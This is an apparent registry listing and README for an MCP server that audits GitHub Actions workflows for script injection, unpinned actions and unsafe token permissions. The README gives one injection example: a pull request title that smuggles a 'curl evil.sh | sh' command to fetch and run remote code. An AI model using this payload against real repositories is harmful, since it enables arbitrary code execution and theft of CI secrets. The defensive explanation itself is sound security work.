GitHub Actions Security Audit

io.github.tylerscomic-labv1.0.0更新於 Oct 2, 2026

Audit GitHub Actions workflows for script injection, unpinned actions and missing permissions.

已驗證Streamable HTTP可網頁執行Developer ToolsSecurity & Monitoring

概覽

AI 產生的概覽

稽核 GitHub Actions 工作流程 YAML,檢查指令碼注入、未固定版本的操作、缺少權限,以及不安全的 pull_request_target 用法。

功能
此伺服器掃描 GitHub Actions 工作流程 YAML 中的安全性問題,而非風格問題。它會解析 YAML 結構,回報 run 步驟中來自攻擊者可控運算式的指令碼注入、僅固定到標籤或分支的第三方操作、缺少的 permissions 區塊,以及 pull_request_target 與簽出 PR 頭端提交合併使用的情況。audit_workflow 工具會傳回風險等級,以及每個發現的位置、原因和具體修正建議;check_expression_injection 則用於檢查單一 shell 指令字串。
適用情境
適用於審查或強化 CI/CD 工作流程,尤其是在合併工作流程檔案變更之前,或稽核會執行不受信任提取要求(pull request)的儲存庫時。適合希望進行針對性安全檢查而非通用 YAML 檢查的維護者。
執行需求
託管選項是遠端 streamable HTTP 端點,不需要本機執行環境。自行託管需要 Node.js,安裝相依套件後在本機執行伺服器。託管方案描述為免費層加上付費 Pro 選項。
安裝前請注意
託管端點會接收你的工作流程 YAML,其中可能包含儲存庫名稱、分支名稱及其他設定細節。自行託管可避免將這些內容傳送給第三方。稽核為唯讀分析,不會修改工作流程。

安裝

在 SourceWeft 中

  1. 開啟 儀表板中的 GitHub Actions Security Audit,將其新增到工作區。
  2. 為需要使用其工具的對話啟用該服務。

Web executable,透過 Streamable HTTP。 遠端服務在工作區中設定後即可從網頁執行環境執行。

其他 MCP 客戶端

把它新增到你客戶端的 mcpServers 設定中。

{
  "mcpServers": {
    "github-actions-audit-mcp": {
      "type": "http",
      "url": "https://github-actions-audit-mcp.mcpize.run/mcp"
    }
  }
}

README

github-actions-audit-mcp

[License: MIT] [Live on MCPize]

An MCP server that audits GitHub Actions workflow YAML for the real vulnerability classes that have caused actual incidents — not a linter, a security scanner. Parses genuine YAML structure (a hand-written block parser scoped to what workflow files actually use), not string/regex matching against the raw file.

What it catches

Script injection. Any ${{ github.event.issue.title }}-style expression that carries attacker-controlled text (issue/PR titles, comments, review bodies, branch names) interpolated directly into a run: shell step. The expression is substituted into the generated shell script before the shell runs it — a PR titled "; curl evil.sh | sh # becomes literal shell syntax, not a string. This is the single most common real-world GitHub Actions vulnerability. Flags the exact expression and shows the env-variable fix that actually neutralizes it.

Unpinned third-party actions. uses: some-action@v4 or @main can be repointed by whoever controls that tag/branch, without you changing a single character in your workflow file — this is exactly what happened in the tj-actions/changed-files compromise (March 2025), where a maintainer's PAT was used to retag v35–v46 to point at a credential-harvesting commit. Only a full 40-character commit SHA is immutable.

Missing permissions: blocks. No explicit permissions: means the GITHUB_TOKEN defaults to whatever your repo/org settings allow — often read-write. If any step is ever compromised, it inherits that full scope.

pull_request_target + head checkout. This trigger runs with the base repo's secrets and a write-scoped token (unlike plain pull_request), and if the workflow also checks out the PR's own head commit, a fork's PR can run arbitrary code with your secrets. Real supply-chain incidents follow this exact pattern.

Tools

audit_workflow

Full audit of a workflow YAML file. Returns a risk level and every finding with its exact location, why it's dangerous, and a concrete fix.

check_expression_injection

Focused check on a single shell command string, for when you just want to sanity-check one run: step without a full workflow file.

Use it

Hosted (recommended): MCPize — free tier, $7/mo Pro.

Self-host:

bash
npm installnode server.js

Part of a small suite

regex-safety-audit-mcp, mcp-trust-audit-mcp, secrets-leak-audit-mcp, dockerfile-audit-mcp.

License

MIT

來源:README.md,提交 9c5baae

工具

0
工具後設資料尚未被收錄。

版本歷史

1
  1. v1.0.0最新Oct 2, 2026